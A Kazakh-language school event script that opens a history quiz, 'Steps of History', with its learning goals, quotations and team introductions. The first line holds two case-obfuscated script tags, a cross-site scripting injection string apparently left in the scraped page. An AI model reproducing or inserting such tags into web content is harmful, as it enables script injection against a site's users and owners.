<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
«Тарих қадамдары» интеллектуалды сайысы
Мақсаты:
1. Білімділік: Интеллектуалдық сайысқа қатысушы оқушылардың тарихи білімдерін дамыту.
2. Дамытушылық: Қазақстан тарихы пәніне қызығушылықтарын арттыру, шығармашылық қабілеттерін
нығайту, тарихи зерделік қасиеттерін дамыту.
3. Тәрбиелік: Қазіргі заман талабына сай күнделікті теледидардан көрсетіліп жүрген
танымдық бағдарламаларды негізге ала отырып, оқушыларды қоғамдық жаңалықтардан
және өзгерістерден тыс қалмауға баулу.
Сонау ежелгі өркениет кезеңдерінен — ақ адамзаттың дамуы мен қалыптасуы жайында көптеген ғалымдар ғылыми әрі теориялық, тәжірибелік ізденістерін, пікірлерін ұстанумен келеді. Бұл тұрғыдан қазақ
халқы да кем де емес.
Ұлы Абай, Шәкәрім, Ыбырай сынды алыптарымыздың осы жолда көрсеткен тәлімі мен білімі еш ұмытылмақ емес.
Ал Елбасымыз Н. Ә. Назарбаев «Біз өмір бойы жететін білім моделінен өмір бойы білім алу моделіне көше алуға тиіспіз» — деп білімнің маңызын айрықша жоғары бағалаған. Ендеше, құрметті жас достар! Ғылым мен білім бәсекесі туындаған ХХІ ғасырдың тәуелсіз, егеменді еліміздің болашақтары, құрметті қонақтар, гуманитарлық пәндер
апталығына байланысты мектепішілік «Тарих қадамдары» атты тарихи танымдық сайысымызды бастауға рұқсат етіңіздер.
Сайысымызды бастамас бұрын әр топ өзінің атымен және ұранымен таныстырады, әділқазылар топтардың таныстыруын бағалайды.